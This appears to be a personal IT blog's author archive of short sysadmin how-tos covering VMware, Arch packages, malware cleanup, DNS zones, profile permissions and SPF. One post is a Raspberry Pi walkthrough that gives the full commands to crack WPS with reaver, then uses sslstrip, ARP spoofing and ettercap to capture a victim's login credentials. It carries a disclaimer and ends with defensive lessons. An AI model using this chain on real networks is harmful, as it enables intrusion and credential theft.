Wapnet Blog

Author Archive

This is a HOWTO for installing VMware Tools on Centos 6.x.

Update your system so the kernel headers/devel will match your system:

yum update

Install the VMware tools prerequisites:

yum install make gcc kernel-devel kernel-headers glibc-headers perl

Reboot the server:

shutdown -r now

Mount the VMware Tools CD (after inserting it into the VM)

mkdir /media/cdrom
mount /dev/cdrom /media/cdrom

Copy the install bundle from the CD and extract it.

cp /mnt/cdrom/VMware-Tools*.tar.gz /root
cd /root
tar xvfz VMwareTools*.tar.gz

Run the installer, default on all prompts works fine.

cd /root/vmware-tools-distrib
./vmware-install.pl

Reboot the server.

shutdown -r now

Source: http://mondotech.blogspot.nl/2012/05/install-vmware-tools-on-rhel-6-centos-6.html

Sometimes when a LUN is full a VM cannot shutdown properly

• Make a SSH connection to the host where the VM running at
• Login as root
• list all running VM’s

# vmware-cmd -l

• Get the current state

# vmware-cmd /vmfs/volumes/<UUID>/<VMDIR>/<VMNAME>.vmx getstate

• Output:

[root@esx ~]# vmware-cmd /vmfs/volumes/<UUID>/<VMDIR>/<VMNAME>.vmx getstate
getstate() = stuck

• Now you know for sure the status is stuck you can kill the VM

ps auxwww |grep -i <VMNAME>.vmx</span>

• Output:

root 3093 0.0 0.3 2016 860 ? S< Jul30 0:17 /usr/lib/vmware/bin/vmkload_app /usr/lib/vmware/bin/vmware-vmx -ssched.group=host/user -# name=VMware ESX Server;version=3.5.0;licensename=VMware ESX Server;licenseversion=2.0 build-158874; -@ pipe=/tmp/vmhsdaemon-0/vmx569228e44baf49d1; /vmfs/volumes/49392e30-162037d0-17c6-001f29e9abec/<VMDIR>/<VMNAME>.vmx

• The code right after root is the PID you must kill.
• First try only kill

#kill 3093

• Wait 30 seconds and try a getstate again:

# vmware-cmd /vmfs/volumes/<UUID>/<VMDIR>/<VMNAME>.vmx getstate

• If the state is “off” your ready. If the state is still stuck try the following:

#kill -9 3093

• Wait 30 seconds and see the state is “off” now.

If the state is still “stuck” migrate all VM’s to another host en reboot the host.

When the VM is off by the kill command HA (High Availability) will power on the host automaticly. Now power down the server during the boot trough the VMWare GUI. If the VM is off try to remove snapshots, (re) move disks, or fix the thing who cause the crash.

Source: VMware KB 1004340

There are a lot of security issues because of bad plugins (Java, Flash, etc). You can disable all plugins by default so you must click to activate.

• about:config
• plugins.click_to_play
• set value to true
• Restart the browser

Now all plugin are diabled by default and you must click to activate.

Finally I found a nice project for my Raspberry PI I’ll write down some notes in this post to make it easier to find back some linux commands. Please use this documentation only as a white hat hacker and for learning purposes only!!!!

First:

• Have a compatible USB wireless dongle (list @ pwnpi.net )
• Download PwnPI @ pwnpi.net
• Download win32diskimager @ http://sourceforge.net/projects/win32diskimager/
• Write the image to a SD card
• Boot up your PI (with a network cable)
• Scan the network (I use netscan.exe)
• Connect with putty to your device

To break in a WPS compatible wireless access point:

• airmon-ng start wlan0
• 
• reaver -i mon0 -b 64:27:37:50:02:77 -c 5 -vv
• After +/- 10 hours you have the PSK

Now configure the wireless with your credentials

• airmon-ng stop wlan0
• nano /etc/network/interfaces
• Original file:

auto lo

iface lo inet loopback
iface eth0 inet dhcp

allow-hotplug wlan0
iface wlan0 inet manual
wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

• New file:

auto lo

iface lo inet loopback
iface eth0 inet dhcp
iface wlan0 inet dhcp
wpa-ssid "L0g0ff"
wpa-psk "SomePassword"
allow-hotplug wlan0
iface wlan0 inet dhcp
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp

• Now bring up the wireless card: ifup wlan0

Now the wireless setup is done we make our PI an IP forwarding server. So that we can do man in the middle attacks.

• nano /proc/sys/net/ipv4/ip_forward change the 0 to 1

• iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 

  (needed to forward all HTTP traffic to SSLStrip)

• sslstrip -l 666 (do not close this terminal)

Now the proxy is running we want to ARP spoof so that we can redirect all traffic to our PI

• arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1 (where 1.12 is our victim and 1.1 our gateway) (do not close ths terminal)
• You can also spoof the entire network with arpspoof -i wlan0 192.168.1.1, but if your PI cannot handle all traffic you will DoS your network.

And now all things are set the sniffing can begin

• ettercap -m ettercap.log -Tq -i wlan0 (don’t close the terminal)

The only thing left now is wait that the victim is going to log in a website and the username and password will write in to the ettercap.log file. With the command cat ettercap.log |grep USER you can see all the login credentials.

What do we learned?

1. Never login to a website without https
2. Never login to a website with https errors
3. Always disable WPS on your router
4. On company wireless sites always use a DMZ

Sources:
http://www.ikwashetniet.blogspot.nl/2012/01/wps-van-handig-hulpmiddel-naar-gapend.html
http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html

Some packages are not in the default repositories you can install these on a alternative way.

First install the base development tools:

#pacman -S base-devel
#pacman -S wget
#pacman -S sudo

Go to https://aur.archlinux.org and find you package
Find the tarball, right click it and copy link location
Wget the package (example nemo-fm) and install the package

$cd ~
$wget https://aur.archlinux.org/packages/ne/nemo-fm/nemo-fm.tar.gz 
$tar xvzf nemo-fm.tar.gz
$cd nemo-fm
$makepkg -s
$sudo pacman -U nemo-fm-1.0.2-1-i686.pkg.tar.xz

Have fun

Best way to clean malware, rootkits, trojans and virusses (I call it malware from now on) is to backup your data, scan your data with another computer, remove your partition, reinstall Windows, install a virusscanner, update your Windows and put you data back. This is the safest method and I allways recommend this to people.

But if you don’t want to reinstall everything you can follow this steps to get a infected pc clean.

1. Go to http://support.kaspersky.com/viruses/rescuedisk/main?qid=208286083 and download the USB util and the Kaspersky Rescue Disk 10 image
2. Create a bootable USB disk with the USB util. You also can burn the ISO to a CD
3. Boot from the USB/CD
4. Make a network connection (I recommend using a network cable)
5. Update the virus definitions
6. Select all options and  do a full system scan. This can take about 1,5 hour. Maybe longer if you use a slow disk/pc
   
7. Clean all the malware
8. Exit the rescue disk and boot windows
9. Now download Kaspersky TDSSKiller @ http://support.kaspersky.com/faq/?qid=208283363
10. Install the TDSSKiller software, scan the pc and remove the rootkits. It is almost impossible to clean a rootkit with a standard virusscanner. And because of some rootkits you can’t install drivers so you can’t load an antivirus real time protection.
11. Now install a virusscanner. I recommend MS Security Essentials. This is a free antivirus software.
12. Update the antivirus (this can take 45 min the first time so please be patient) software and do a full scan.
13. Now download and install Malwarebytes Anti-Malware and do a full system scan.
14. Update your Windows true windows update (and turn automatic updates ON!), update your browser, update Java and Flash or remove it.

Now your pc is clean of almost any type of malware and ready to protect it for new malware. All steps together takes almost 6 hours of scanning. So maybe reinstall your operating system is always the best option

This steps helped me to clean a very bad infected laptop that had not any antivirus realtime protection installed. If this steps also helps you to fix a infected pc please leave a comment below or buy me a beer (see widget on the right).

The difference between stub zone and secondary DNS zones…  It all relates to replication, efficiency and availability.

Think of it like this:
There are two cities, London and Manchester.
London has 100 people, each with a book full of information (so 100 books in total).
You are in Manchester and you want to be able to have access to the information in these “books”.

There are two ways to do this as follows:
a) Another 100 people appear in London, they each make a copy of a book, and they each take their own car in order to drive to Manchester to meet you and give you the books. This causes a traffic jam due to the high number of people driving on the highway.

The above is secondary zone replication.

b) Instead of the above, you received the address of the 100 people in London. You need information in one of the books. You decide to take your car, and you drive to the address. You found the information you need, and you drive back to Manchester.

This example is a stub zone.

So think about it for a second.
In example A, the information is stored twice, both in London and Manchester, but the information requires a big highway to transport those 100 people, each in their individual cars, to your office in Manchester. Do you have a big enough highway to support this many people?
In example B, you don’t need such a big highway because a massive number of people are not clogging the highway, each trying to bring a book to you, but instead you decide to go back to London to find the book you need.

So what do we gather from this?
In example A, you need a large highway (lots of bandwidth) to get the books from London to Manchester. But once the information is in Manchester, you can very quickly find the book you need.
In example B, you don’t need a large highway to find the book in London, but you do need a RELIABLE highway. If this highway is closed, how do you get the book? And remember, since the books are not in Manchester, it will take longer for you to get the book (since you need to drive back and forth for it).

Hope this helps, first thing that came to my mind.

Thanks to Shinigami

By default the Roaming profile is only accessible for the owner (end-user) and the system account. I found a post on the internet with a workaround to access the profile without problems to the end user.

Using two tools, the first is SubInAcl.exe available from Microsoft (download), and the second is cacls.exe which you should already have by default in Windows.

These first two commands will give the local administrators group ownership of the user’s folder and everything underneath. NOTE: This will not change any existing permissions.

SubInAcl /subdirectories D:\Profile\User.Name /setowner=Administrators
SubInAcl /subdirectories D:\Profile\User.Name\*.* /setowner=Administrators

This second command will give the local administrators group full access to the user’s foldercacls

D:\Profile\User.Name /T /E /C /G Administrators:F

Source Article

Maybe it’s a illusion but if every one use a mail SPF DNS record and everyone will bounce or filter domains without a SPF the internet is spam free

Microsoft has a nice wizard to create a SPF for your own domain: http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/